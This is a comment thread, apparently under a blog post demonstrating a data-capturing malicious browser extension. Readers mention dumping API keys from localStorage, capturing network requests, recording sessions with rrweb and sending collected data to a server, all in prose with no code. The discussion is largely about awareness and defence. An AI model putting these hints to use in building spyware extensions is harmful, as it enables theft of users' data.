17 Comments

epic and terrifying

Expand full comment

Some vendors store API keys in the localStorage, so you could dump those if you wanted as well. Browser extensions can be very dangerous and in a corporate environment they need to be reviewed and controlled.

Expand full comment

Great point. I might do a followup post with more 'sploits.

Expand full comment

Discussed on Hacker News:

https://news.ycombinator.com/item?id=34889243

Expand full comment

I was testing this out, but can’t find where the logs are stored

Expand full comment

I tried it myself and all the warnings were presented. Did they fix it?

Expand full comment

I tried it myself and all the warnings were presented. Did they fix it?

Expand full comment

Hi Matt, great article!

I do have a quick question regarding the network capturing traffic part of the extension: is there any way to also get the server response as well (since webRequest beforeRequest is triggered before receiving any server side data)? I had an issue in the past with the webRequest API and couldn't find a way to get the response without making a new web request from the background service code.

Expand full comment

As one of the core-team members of rrweb I was afraid you where going to mis-use rrweb for this case. Happy to see you didn’t but at the same time terrified that it would very much be possible to use it for this

Expand full comment

Great article but what you can do with the captured data? can you send it to a server ?

Expand full comment

Yes data you collect could be sent to your sercer, by using HTTP or WebSocket call.

Expand full comment

but maybe the Browser has a protection vs that ?

Expand full comment

If you have access to dev tools of an extension - background page in MV2, service worker in MV3. Then you could use debugger and read all data that are stored in memory. You could also check data that are saved/loaded from e.g local storage.

I will use chrome extension for another example. You could set so called - access level: https://developer.chrome.com/docs/extensions/reference/storage/#type-AccessLevel

By default you have trusted level. But as you could read here: https://groups.google.com/a/chromium.org/g/chromium-extensions/c/il2DYn49HAw?pli=1, it could be applied into session storage only.

Expand full comment

actually Manifest v2 is pretty limited already with no way to interact with the browser interface, browser generated pages (unless explicitly stated it needs that ability and user flips the flag in their browser and gets bothered by a warning every time they start their browser, this one isn't available in WebExtensions though), extension generated pages, in effect making things like (context aware, but even more basic) mouse gestures, keyboard shortcuts, GUI tweakers impossible

Expand full comment

Fix typo: "how it an be captured"

Expand full comment

Dark Reader and the like is an issue for security, but could easily be built into chromium. Chromium already has a broken version of Dark Reader built in - and built in it is much faster. But we need white and black listing abilities at the minimum. This is a common thing that should be built in instead of an extension.

The only other thing that is pretty much universally needed is extension for password managers. Perhaps there's a way to better secure that too but I've not seen exploits for browser password extensions yet - but they may exist.

Expand full comment

Is there a way to use this to save all pages of Google Books offline for perusal, say as a PDF or just raw image captures of every single page available?

Expand full comment